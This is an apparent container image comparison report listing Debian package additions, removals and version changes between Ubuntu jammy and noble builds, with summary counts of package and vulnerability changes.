♾️	libgz-sensors8-air-pressure	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-pressure-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-speed	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-air-speed-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-altimeter	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-altimeter-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-boundingbox-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-boundingbox-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-core-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-depth-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-depth-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-dvl	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-dvl-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-force-torque	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-force-torque-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-gpu-lidar	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-gpu-lidar-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-imu	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-imu-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-lidar	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-lidar-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-logical-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-logical-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-magnetometer	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-magnetometer-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-navsat	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-navsat-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rendering	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rendering-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rgbd-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-rgbd-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-segmentation-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-segmentation-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-thermal-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-thermal-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-wide-angle-camera	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sensors8-wide-angle-camera-dev	8.2.2-1~jammy	8.2.2-1~noble
♾️	libgz-sim8	8.10.0-1~jammy	8.10.0-1~noble
♾️	libgz-sim8-dev	8.10.0-1~jammy	8.10.0-1~noble
♾️	libgz-sim8-plugins	8.10.0-1~jammy	8.10.0-1~noble
♾️	libgz-tools2-dev	2.0.3-1~jammy	2.0.3-1~noble
♾️	libgz-transport13	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-core-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-log	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-log-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-parameters	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-transport13-parameters-dev	13.5.0-1~jammy	13.5.0-1~noble
♾️	libgz-utils2	2.2.1-1~jammy	2.2.1-1~noble
♾️	libgz-utils2-cli-dev	2.2.1-1~jammy	2.2.1-1~noble
♾️	libgz-utils2-dev	2.2.1-1~jammy	2.2.1-1~noble
➕	libharfbuzz-cairo0		8.3.0-2build2
➕	libharfbuzz-dev		8.3.0-2build2
➕	libharfbuzz-gobject0		8.3.0-2build2
➕	libharfbuzz-icu0		8.3.0-2build2
➕	libharfbuzz-subset0		8.3.0-2build2
♾️	libharfbuzz0b	2.7.4-1ubuntu3.2	8.3.0-2build2
♾️	libhdf4-0-alt	4.2.15-4	4.2.16-4build1
♾️	libhdf4-alt-dev	4.2.15-4	4.2.16-4build1
➖	libhdf5-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-103-1t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-cpp-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-cpp-103-1t64		1.10.10+repack-3.1ubuntu4
♾️	libhdf5-dev	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
➖	libhdf5-fortran-102	1.10.7+repack-4ubuntu2
➕	libhdf5-fortran-102t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-hl-100	1.10.7+repack-4ubuntu2
➕	libhdf5-hl-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-hl-cpp-100	1.10.7+repack-4ubuntu2
➕	libhdf5-hl-cpp-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-hl-fortran-100	1.10.7+repack-4ubuntu2
➕	libhdf5-hl-fortran-100t64		1.10.10+repack-3.1ubuntu4
♾️	libhdf5-mpi-dev	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-103-1t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-cpp-103-1	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-cpp-103-1t64		1.10.10+repack-3.1ubuntu4
♾️	libhdf5-openmpi-dev	1.10.7+repack-4ubuntu2	1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-fortran-102	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-fortran-102t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-hl-100	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-hl-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-hl-cpp-100	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-hl-cpp-100t64		1.10.10+repack-3.1ubuntu4
➖	libhdf5-openmpi-hl-fortran-100	1.10.7+repack-4ubuntu2
➕	libhdf5-openmpi-hl-fortran-100t64		1.10.10+repack-3.1ubuntu4
♾️	libheif-dev	1.12.0-2build1	1.17.6-1ubuntu4.2
➕	libheif-plugin-aomdec		1.17.6-1ubuntu4.2
➕	libheif-plugin-libde265		1.17.6-1ubuntu4.2
♾️	libheif1	1.12.0-2build1	1.17.6-1ubuntu4.2
➖	libhiredis0.14	0.14.1-2
➕	libhiredis1.1.0		1.2.0-6ubuntu3
➖	libhogweed6	3.7.3-1build2
➕	libhogweed6t64		3.9.1-2.2build1.1
➕	libhsa-runtime64-1		5.7.1-2build1
➕	libhsakmt1		5.7.0-1build1
➕	libhwasan0		14.2.0-4ubuntu2~24.04.1
♾️	libhwloc-dev	2.7.0-2ubuntu1	2.10.0-1build1
♾️	libhwloc-plugins	2.7.0-2ubuntu1	2.10.0-1build1
♾️	libhwloc15	2.7.0-2ubuntu1	2.10.0-1build1
➕	libhwy1t64		1.0.7-8.1build1
♾️	libhyphen0	2.8.8-7build2	2.8.8-7build3
♾️	libibus-1.0-5	1.5.26-4	1.5.29-2
♾️	libibus-1.0-dev	1.5.26-4	1.5.29-2
♾️	libibverbs-dev	39.0-1	50.0-2ubuntu0.2
♾️	libibverbs1	39.0-1	50.0-2ubuntu0.2

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

♾️	libice-dev	2:1.0.10-1build2	2:1.0.10-1build3
♾️	libice6	2:1.0.10-1build2	2:1.0.10-1build3
♾️	libicu-dev	70.1-2	74.2-1ubuntu3.1
➖	libicu70	70.1-2
➕	libicu74		74.2-1ubuntu3.1
♾️	libidn2-0	2.3.2-2build1	2.3.7-2build1.1
♾️	libiec61883-0	1.2.0-4build3	1.2.0-6build1
➖	libignition-cmake2-dev	2.17.1-1~jammy
➖	libignition-math6	6.15.1-1~jammy
➖	libignition-math6-dev	6.15.1-1~jammy
➖	libilmbase-dev	2.5.7-2
➖	libilmbase25	2.5.7-2
♾️	libimagequant0	2.17.0-1	2.18.0-1build1
➕	libimath-3-1-29t64		3.1.9-3.1ubuntu2
➕	libimath-dev		3.1.9-3.1ubuntu2
♾️	libinput-bin	1.20.0-1ubuntu0.3	1.25.0-1ubuntu3.2
♾️	libinput10	1.20.0-1ubuntu0.3	1.25.0-1ubuntu3.2
♾️	libinstpatch-1.0-2	1.1.6-1	1.1.6-1build2
➖	libip4tc2	1.8.7-1ubuntu5.2
♾️	libisl23	0.24-2build1	0.26-3build1.1
♾️	libitm1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libjack-jackd2-0	1.9.20~dfsg-1	1.9.21~dfsg-3ubuntu3
➕	libjansson4		2.14-2build2
♾️	libjbig-dev	2.1-3.1ubuntu0.22.04.1	2.1-6.1ubuntu2
♾️	libjbig0	2.1-3.1ubuntu0.22.04.1	2.1-6.1ubuntu2
♾️	libjpeg-dev	8c-2ubuntu10	8c-2ubuntu11
♾️	libjpeg-turbo8	2.1.2-0ubuntu1	2.1.5-2ubuntu2
♾️	libjpeg-turbo8-dev	2.1.2-0ubuntu1	2.1.5-2ubuntu2
♾️	libjpeg8	8c-2ubuntu10	8c-2ubuntu11
♾️	libjpeg8-dev	8c-2ubuntu10	8c-2ubuntu11
♾️	libjs-jquery	3.6.0+dfsg+~3.5.13-1	3.6.1+dfsg+~3.5.14-1
♾️	libjs-jquery-ui	1.13.1+dfsg-1	1.13.2+dfsg-1
♾️	libjs-sphinxdoc	4.3.2-1	7.2.6-6
♾️	libjs-underscore	1.13.2~dfsg-2	1.13.4~dfsg+~1.11.4-3
♾️	libjson-c-dev	0.15-3~ubuntu1.22.04.2	0.17-1build1
♾️	libjson-c5	0.15-3~ubuntu1.22.04.2	0.17-1build1
♾️	libjson-glib-1.0-0	1.6.6-1build1	1.8.0-2build2
♾️	libjson-glib-1.0-common	1.6.6-1build1	1.8.0-2build2
♾️	libjson-perl	4.04000-1	4.10000-1
♾️	libjsoncpp-dev	1.9.5-3	1.9.5-6build1
♾️	libjsoncpp25	1.9.5-3	1.9.5-6build1
➕	libjxl0.7		0.7.0-10.2ubuntu6.1
➖	libjxr0	1.2~git20170615.f752187-5
➕	libjxr0t64		1.2~git20170615.f752187-5.1ubuntu2
♾️	libk5crypto3	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkadm5clnt-mit12	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkadm5srv-mit12	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
➖	libkate1	0.4.1-11build1
➖	libkdb5-10	1.19.2-2ubuntu0.7
➕	libkdb5-10t64		1.20.1-6ubuntu2.6
♾️	libkeyutils1	1.6.1-2ubuntu3	1.6.3-3build1
♾️	libkml-dev	1.3.0-9	1.3.0-12build1
➖	libkmlbase1	1.3.0-9
➕	libkmlbase1t64		1.3.0-12build1
➖	libkmlconvenience1	1.3.0-9
➕	libkmlconvenience1t64		1.3.0-12build1
➖	libkmldom1	1.3.0-9
➕	libkmldom1t64		1.3.0-12build1
➖	libkmlengine1	1.3.0-9
➕	libkmlengine1t64		1.3.0-12build1
➖	libkmlregionator1	1.3.0-9
➕	libkmlregionator1t64		1.3.0-12build1
➖	libkmlxsd1	1.3.0-9
➕	libkmlxsd1t64		1.3.0-12build1
♾️	libkmod2	29-1ubuntu1	31+20240202-2ubuntu7.1
♾️	libkrb5-3	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkrb5-dev	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libkrb5support0	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
♾️	libksba8	1.6.0-2ubuntu0.2	1.6.6-1build1
♾️	liblab-gamut1	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	liblapack-dev	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	liblapack3	3.10.0-2ubuntu1	3.12.0-3build1.1
♾️	liblbfgsb0	3.0+dfsg.3-10	3.0+dfsg.4-1build1
➕	liblc3-1		1.0.4-3build1
♾️	liblcms2-2	2.12~rc1-2build2	2.14-2build1
♾️	libldacbt-enc2	2.0.2.3+git20200429+ed310a0-4	2.0.2.3+git20200429+ed310a0-4ubuntu2
➖	libldap-2.5-0	2.5.19+dfsg-0ubuntu0.22.04.1
➕	libldap2		2.6.10+dfsg-0ubuntu0.24.04.1
♾️	liblept5	1.82.0-3build1	1.82.0-3build4
➕	liblerc-dev		4.0.0+ds-4ubuntu2
➕	liblerc4		4.0.0+ds-4ubuntu2
♾️	liblilv-0-0	0.24.12-2	0.24.22-1build1
➖	libllvm14	1:14.0.0-1ubuntu1.1
➖	libllvm15	1:15.0.7-0ubuntu0.22.04.3
➕	libllvm15t64		1:15.0.7-14build3
➕	libllvm17t64		1:17.0.6-9ubuntu1
➕	libllvm18		1:18.1.3-1ubuntu1
➕	libllvm20		1:20.1.2-0ubuntu1~24.04.2
♾️	liblocale-gettext-perl	1.07-4build3	1.07-6ubuntu5
➕	liblrdf0		0.6.1-4build1
♾️	liblsan0	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libltc11	1.3.1-1	1.3.2-1build1
♾️	libltdl-dev	2.4.6-15build2	2.4.7-7build1
♾️	libltdl7	2.4.6-15build2	2.4.7-7build1
➕	liblttng-ctl0t64		2.13.11-2.1build4
➕	liblttng-ust-common1t64		2.13.7-1.1ubuntu2
➕	liblttng-ust-ctl5t64		2.13.7-1.1ubuntu2
➕	liblttng-ust-dev		2.13.7-1.1ubuntu2
➕	liblttng-ust-python-agent1t64		2.13.7-1.1ubuntu2
➕	liblttng-ust1t64		2.13.7-1.1ubuntu2
♾️	liblz4-1	1.9.3-2build2	1.9.4-1build1.1
♾️	liblz4-dev	1.9.3-2build2	1.9.4-1build1.1
♾️	liblzma-dev	5.2.5-2ubuntu1	5.6.1+really5.4.5-1ubuntu0.2
♾️	liblzma5	5.2.5-2ubuntu1	5.6.1+really5.4.5-1ubuntu0.2
➕	liblzo2-2		2.10-2build4
♾️	libmad0	0.15.1b-10ubuntu1	0.15.1b-10.2ubuntu1
♾️	libmad0-dev	0.15.1b-10ubuntu1	0.15.1b-10.2ubuntu1
♾️	libmagic-mgc	1:5.41-3ubuntu0.1	1:5.45-3build1
➖	libmagic1	1:5.41-3ubuntu0.1
➕	libmagic1t64		1:5.45-3build1
➕	libmbedcrypto7t64		2.28.8-1
♾️	libmd-dev	1.0.4-1build1	1.1.0-2build1.1
♾️	libmd0	1.0.4-1build1	1.1.0-2build1.1
♾️	libmd4c0	0.4.8-1	0.4.8-1build1
♾️	libmfx1	22.3.0-1	22.5.4-1
♾️	libmikmod-dev	3.3.11.1-6	3.3.11.1-7build1
♾️	libmikmod3	3.3.11.1-6	3.3.11.1-7build1
♾️	libminizip-dev	1.1-8build1	1:1.3.dfsg-3.1ubuntu2.1
➖	libminizip1	1.1-8build1
➕	libminizip1t64		1:1.3.dfsg-3.1ubuntu2.1
➖	libmjpegutils-2.1-0	1:2.1.0+debian-6build1
➕	libmjpegutils-2.1-0t64		1:2.1.0+debian-8.1build1
♾️	libmodplug1	1:0.8.9.0-3	1:0.8.9.0-3build1
➕	libmodule-implementation-perl		0.09-2
➕	libmodule-runtime-perl		0.016-2
♾️	libmount-dev	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libmount1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libmp3lame0	3.100-3build2	3.100-6build1
♾️	libmpc3	1.2.1-2build1	1.3.1-1build1.1
♾️	libmpcdec6	2:0.1~r495-2	2:0.1~r495-2build1
➖	libmpdec3	2.5.1-2build2
➖	libmpeg2encpp-2.1-0	1:2.1.0+debian-6build1
➕	libmpeg2encpp-2.1-0t64		1:2.1.0+debian-8.1build1
♾️	libmpfr6	4.1.0-3build3	4.2.1-1build1.1
➖	libmpg123-0	1.29.3-1ubuntu0.1
➕	libmpg123-0t64		1.32.5-1ubuntu1.1
➖	libmplex2-2.1-0	1:2.1.0+debian-6build1
➕	libmplex2-2.1-0t64		1:2.1.0+debian-8.1build1
➕	libmro-compat-perl		0.15-2
➖	libmtdev1	1.1.6-1build4
➕	libmtdev1t64		1.1.6-1.1build1
➕	libmunge2		0.5.15-4ubuntu0.1
♾️	libmysofa1	1.2.1~dfsg0-1	1.3.2+dfsg-2ubuntu2
♾️	libmysqlclient-dev	8.0.44-0ubuntu0.22.04.2	8.0.45-0ubuntu0.24.04.1
♾️	libmysqlclient21	8.0.44-0ubuntu0.22.04.2	8.0.45-0ubuntu0.24.04.1
		Removed vulnerabilities (6):
➕	libnamespace-autoclean-perl		0.29-2
➕	libnamespace-clean-perl		0.27-2
♾️	libncurses6	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
♾️	libncursesw6	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
➕	libneon27t64		0.33.0-1.1build3
➖	libnetcdf-c++4	4.2-12build1
➖	libnetcdf-cxx-legacy-dev	4.2-12build1
♾️	libnetcdf-dev	1:4.8.1-1	1:4.9.2-5ubuntu4
➖	libnetcdf19	1:4.8.1-1
➕	libnetcdf19t64		1:4.9.2-5ubuntu4
➖	libnettle8	3.7.3-1build2
➕	libnettle8t64		3.9.1-2.2build1.1
♾️	libnghttp2-14	1.43.0-1ubuntu0.2	1.59.0-1ubuntu0.2
♾️	libnice10	0.1.18-2	0.1.21-2build3
♾️	libnl-3-200	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnl-3-dev	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnl-route-3-200	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnl-route-3-dev	3.5.0-0.1	3.7.0-0.3build1.1
♾️	libnorm-dev	1.5.9+dfsg-2	1.5.9+dfsg-3.1build1
➖	libnorm1	1.5.9+dfsg-2
➕	libnorm1t64		1.5.9+dfsg-3.1build1
♾️	libnotify4	0.7.9-3ubuntu5.22.04.1	0.8.3-1build2
➖	libnpth0	1.6-3build2
➕	libnpth0t64		1.6-3.1build1
➖	libnsl-dev	1.3.0-2build2
➖	libnsl2	1.3.0-2build2
♾️	libnspr4	2:4.35-0ubuntu0.22.04.1	2:4.35-1.1build1
♾️	libnss3	2:3.98-0ubuntu0.22.04.2	2:3.98-1build1
♾️	libnuma-dev	2.0.14-3ubuntu2	2.0.18-1ubuntu0.24.04.1
♾️	libnuma1	2.0.14-3ubuntu2	2.0.18-1ubuntu0.24.04.1
➖	liboctomap1.9	1.9.7+dfsg-3
➕	liboctomap1.9t64		1.9.7+dfsg-3.1build3
♾️	libodbc2	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
♾️	libodbccr2	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
♾️	libodbcinst2	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
➖	libode8	2:0.16.2-1
➕	libode8t64		2:0.16.2-1.1build1
♾️	libogdi-dev	4.1.0+ds-5	4.1.1+ds-3build1
♾️	libogdi4.1	4.1.0+ds-5	4.1.1+ds-3build1
♾️	libogg-dev	1.3.5-0ubuntu3	1.3.5-3build1
♾️	libogg0	1.3.5-0ubuntu3	1.3.5-3build1
♾️	libogre-1.9-dev	1.9.0+dfsg1-12.1ubuntu1	1.9.0+dfsg1-14.1build2
➕	libogre-1.9.0t64		1.9.0+dfsg1-14.1build2
➖	libogre-1.9.0v5	1.9.0+dfsg1-12.1ubuntu1
♾️	libogre-next-2.3-dev	2.3.1-9osrf~jammy	2.3.1-9osrf~noble
♾️	libogre-next-2.3.0	2.3.1-9osrf~jammy	2.3.1-9osrf~noble
♾️	libopenal-data	1:1.19.1-2build3	1:1.23.1-4build1
♾️	libopenal1	1:1.19.1-2build3	1:1.23.1-4build1
♾️	libopencv-calib3d-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-calib3d4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-calib3d406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-contrib-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-contrib4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-contrib406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-core-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-core4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-core406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-dnn-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-dnn4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-dnn406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-features2d-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-features2d4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-features2d406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-flann-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-flann4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-flann406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-highgui-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-highgui4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-highgui406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-imgcodecs-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-imgcodecs4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-imgcodecs406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-imgproc-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-imgproc4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-imgproc406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-ml-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-ml4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-ml406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-objdetect-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-objdetect4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-objdetect406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-photo-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-photo4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-photo406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-shape-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-shape4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-shape406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-stitching-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-stitching4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-stitching406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-superres-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-superres4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-superres406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-video-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-video4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-video406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-videoio-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-videoio4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-videoio406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-videostab-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-videostab4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-videostab406t64		4.6.0+dfsg-13.1ubuntu1
♾️	libopencv-viz-dev	4.5.4+dfsg-9ubuntu4	4.6.0+dfsg-13.1ubuntu1
➖	libopencv-viz4.5d	4.5.4+dfsg-9ubuntu4
➕	libopencv-viz406t64		4.6.0+dfsg-13.1ubuntu1
➕	libopenexr-3-1-30		3.1.5-5.1build3
♾️	libopenexr-dev	2.5.7-1	3.1.5-5.1build3
➖	libopenexr25	2.5.7-1
♾️	libopengl-dev	1.4.0-1	1.7.0-1build1
♾️	libopengl0	1.4.0-1	1.7.0-1build1
➖	libopenh264-6	2.2.0+dfsg-2
➕	libopenh264-7		2.4.1+dfsg-1
♾️	libopenjp2-7	2.4.0-6ubuntu0.4	2.5.0-2ubuntu0.4
♾️	libopenjp2-7-dev	2.4.0-6ubuntu0.4	2.5.0-2ubuntu0.4
♾️	libopenmpi-dev	4.1.2-2ubuntu1	4.1.6-7ubuntu2
➖	libopenmpi3	4.1.2-2ubuntu1
➕	libopenmpi3t64		4.1.6-7ubuntu2
➖	libopenmpt0	0.6.1-1
➕	libopenmpt0t64		0.7.3-1.1build3
♾️	libopenni-dev	1.5.4.0+dfsg-5	1.5.4.0+dfsg-7.1build1
➖	libopenni0	1.5.4.0+dfsg-5
➕	libopenni0t64		1.5.4.0+dfsg-7.1build1
♾️	libopenni2-0	2.2.0.33+dfsg-15	2.2.0.33+dfsg-18
♾️	libopenni2-dev	2.2.0.33+dfsg-15	2.2.0.33+dfsg-18
♾️	libopus0	1.3.1-0.1build2	1.4-1build1
➖	liborc-0.4-0	1:0.4.32-2ubuntu0.1
➕	liborc-0.4-0t64		1:0.4.38-1ubuntu0.1
♾️	liborc-0.4-dev	1:0.4.32-2ubuntu0.1	1:0.4.38-1ubuntu0.1
♾️	liborc-0.4-dev-bin	1:0.4.32-2ubuntu0.1	1:0.4.38-1ubuntu0.1
♾️	liborocos-kdl-dev	1.5.1-2build1	1.5.1-4build1
♾️	liborocos-kdl1.5	1.5.1-2build1	1.5.1-4build1
♾️	libp11-kit0	0.24.0-6build1	0.25.3-4ubuntu2.1
➕	libpackage-stash-perl		0.40-1
♾️	libpackagekit-glib2-18	1.2.5-2ubuntu3	1.2.8-2ubuntu1.4
♾️	libpam-modules	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpam-modules-bin	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpam-runtime	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpam-systemd	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libpam0g	1.4.0-11ubuntu2.6	1.5.3-5ubuntu5.5
♾️	libpango-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
➕	libpango1.0-dev		1.52.1+ds-1build1
♾️	libpangocairo-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
♾️	libpangoft2-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
♾️	libpangoxft-1.0-0	1.50.6+ds-2ubuntu1	1.52.1+ds-1build1
➕	libparams-classify-perl		0.015-2build5
➕	libparams-util-perl		1.102-2build3
➕	libparams-validationcompiler-perl		0.31-1
♾️	libpathplan4	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
➖	libpcap0.8	1.10.1-4ubuntu1.22.04.1
➕	libpcap0.8t64		1.10.4-4.1ubuntu3
♾️	libpciaccess-dev	0.16-3	0.17-3ubuntu0.24.04.2
♾️	libpciaccess0	0.16-3	0.17-3ubuntu0.24.04.2
➖	libpcl-apps1.12	1.12.1+dfsg-3build1
➕	libpcl-apps1.14		1.14.0+dfsg-1
➖	libpcl-common1.12	1.12.1+dfsg-3build1
➕	libpcl-common1.14		1.14.0+dfsg-1
♾️	libpcl-dev	1.12.1+dfsg-3build1	1.14.0+dfsg-1
➖	libpcl-features1.12	1.12.1+dfsg-3build1
➕	libpcl-features1.14		1.14.0+dfsg-1

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

